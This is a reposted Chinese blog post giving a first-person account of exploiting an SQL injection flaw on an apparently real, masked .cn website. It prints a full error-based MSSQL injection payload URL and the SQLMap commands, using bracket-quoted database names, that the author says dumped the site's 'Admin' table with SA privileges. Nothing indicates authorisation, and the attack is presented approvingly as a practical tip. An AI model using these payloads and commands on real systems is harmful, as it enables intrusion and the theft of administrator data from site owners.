某日偶遇一SQLInjection Point,MSSQL 2008,已開啟顯錯模式。
馬上扔進SQLMap跑，一路順暢，竟然還是SA的權(quán)限，心想運氣真好，無論如何都拿定了。
數(shù)據(jù)庫，表，列都列出來了，但是上–dump參數(shù)就死活跑不出來。
報錯 “unable to retrieve the number of entries for table ‘Admin’ in database ‘2012_xxxx’”——x是馬賽克哈：）
心想應(yīng)該很容易搞定，遂查找手工注入方法，測試無果。
還是回到SQLMap，-h查看幫助，發(fā)現(xiàn)-v 參數(shù)可以指定輸出詳細度，開到-v 3，發(fā)現(xiàn)顯示了payload，一不做二不休，直接開到-v 5，發(fā)現(xiàn)提供了整個http請求，怪不得報錯，原來都是返回500，用firefox打開完整payload，說是語法錯誤。

Xhttp://www.xxxx.cn/xxx/detail.aspx?id=218%20AND%204416%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%2BCHAR%28115%29%2BCHAR%28119%29%2BCHAR%28100%29%2BCHAR%28113%29%2B%28SELECT%20ISNULL%28CAST%28COUNT%28*%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%20FROM%20%222012_xxxx%22..syscolumns%2C2012_xxxx..sysobjects%20WHERE%202012_xxxx..syscolumns.id%3D2012_xxxx..sysobjects.id%20AND%202012_xxxx..sysobjects.name%3DCHAR%2884%29%2BCHAR%2866%29%2BCHAR%2895%29%2BCHAR%2865%29%2BCHAR%28100%29%2BCHAR%28109%29%2BCHAR%28105%29%2BCHAR%28110%29%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28122%29%2BCHAR%28104%29%2BCHAR%28113%29%29%29

顯然是2012的問題，也就是應(yīng)該是錯把庫名中的數(shù)字錯當(dāng)成參數(shù)了

在URL的庫名加上雙引號包裹，果然就可以爆出數(shù)據(jù)了。

問題又來了，要我手工爆數(shù)據(jù)我可搞不定，還是要回到SQLMap啊，意思是要想辦法把庫名包裹起來，不讓系統(tǒng)把它解析成一個參數(shù)

XTEST1: ./sqlmap.py -u http://www.xxxx.cn/xxxx/detail.aspx?id=218 –dump -D”‘2012_xxxx” -T’Admin’

這次好一點了，還是報錯unable to retrieve column names for table ‘Admin’ in database ‘”2012_xxxx”‘，意思是有返回了，但是庫名不對。

XTEST12 ./sqlmap.py -u http://www.xxxx.cn/broadband/detail.aspx?id=218? –dump -D”[2012_xxxx]” -T’Admin’

我也不記得哪來的靈機一動，改用中括號包裹，果然就成功了，dump出整個表了。

XCONCLUSION：在使用SQLMap時可以使用-v參數(shù)指定輸出詳細度，然后直接用瀏覽器查看payload，確定語法錯誤點后想辦法改進。在遇到系統(tǒng)誤判庫名表名是可用中括號包裹名字。

轉(zhuǎn)載于:https://www.cnblogs.com/milantgh/p/4908812.html

總結(jié)

以上是生活随笔為你收集整理的sqlmap注入检测经验0x01的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。